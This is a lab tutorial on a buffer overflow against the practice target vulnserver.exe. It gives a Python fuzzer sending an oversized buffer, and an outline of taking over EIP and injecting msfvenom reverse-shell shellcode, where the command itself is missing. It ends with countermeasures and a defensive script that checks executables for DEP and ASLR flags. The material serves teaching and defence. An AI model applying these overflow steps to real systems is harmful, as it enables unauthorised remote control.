Windows-Based Buffer Overflow Attack
Overview
This document details the exploitation of a vulnerable Windows executable. We use a fuzzing script, analyze crashes, and inject shellcode.
1. Setting Up a Vulnerable Windows Application
We target vulnserver.exe, an intentionally vulnerable program for exploitation practice. Download from: https://github.com/stephenbradshaw/vulnserver
Run vulnserver.exe on a Windows VM. Attach Immunity Debugger to monitor crashes.
2. Fuzzing with Python (fuzz.py)

import socket

target_ip = "192.168.1.100"  # Replace with your Windows VM's IP
target_port = 9999           # vulnserver's default listening port

# Oversized payload; adjust the length while watching the debugger for a crash
buffer = b"A" * 1000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(buffer)
s.close()
print("Sent fuzzing payload.")

Run it:

python fuzz.py
3. Debugging the Crash
Attach Immunity Debugger.
Confirm that the overflow controls EIP (and therefore execution flow).
Inject custom shellcode (e.g., reverse shell).
4. Exploit Development
Once EIP overwrite is confirmed, generate shellcode using msfvenom:
Modify the exploit to inject the shellcode and take control of execution.
5. Countermeasures
Use DEP (Data Execution Prevention).
Implement ASLR (Address Space Layout Randomization).
Use stack canaries to detect buffer overflows.
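A defender-side check for the first two countermeasures, added here as an example (not code from the original page or from the vulnserver project): it reads the DllCharacteristics field of a PE optional header to report whether an executable such as vulnserver.exe was linked with DEP (NX_COMPAT) and ASLR (DYNAMIC_BASE) opt-in bits. The minimal PE header it builds for offline testing is constructed; the flag values are the documented IMAGE_DLLCHARACTERISTICS_* constants.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE optional header
HIGH_ENTROPY_VA = 0x0020  # 64-bit ASLR with high-entropy addresses
DYNAMIC_BASE = 0x0040     # ASLR: image may be relocated at load
NX_COMPAT = 0x0100        # DEP: image opts in to non-executable data pages
GUARD_CF = 0x4000         # Control Flow Guard

def pe_mitigations(data: bytes) -> dict:
    """Report which load-time mitigations a PE image opts into."""
    # Stack canaries (/GS) live in the compiled code, not in a header flag, so not detectable here
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]  # SizeOfOptionalHeader
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B) or opt_size < 72:
        raise ValueError("unsupported or truncated optional header")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "dep": bool(dll_chars & NX_COMPAT),
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "high_entropy_va": bool(dll_chars & HIGH_ENTROPY_VA),
        "cfg": bool(dll_chars & GUARD_CF),
    }

def build_test_pe(dll_chars: int, pe32plus: bool = False) -> bytes:
    """Constructed minimal PE header (no sections), used only as sample input."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew: PE header follows the DOS header
    opt_size = 112 if pe32plus else 96
    coff = struct.pack("<HHIIIHH", 0x8664 if pe32plus else 0x14C, 0, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)  # Magic
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    import sys
    # Pass a path such as vulnserver.exe; with no argument, inspect a constructed header
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(0)
    for name, enabled in pe_mitigations(data).items():
        print(f"{name:16} {'enabled' if enabled else 'MISSING'}")
```

A binary reporting MISSING for dep or aslr is one the loader will map at a fixed base with executable data pages, which is exactly the condition the exploit steps above rely on.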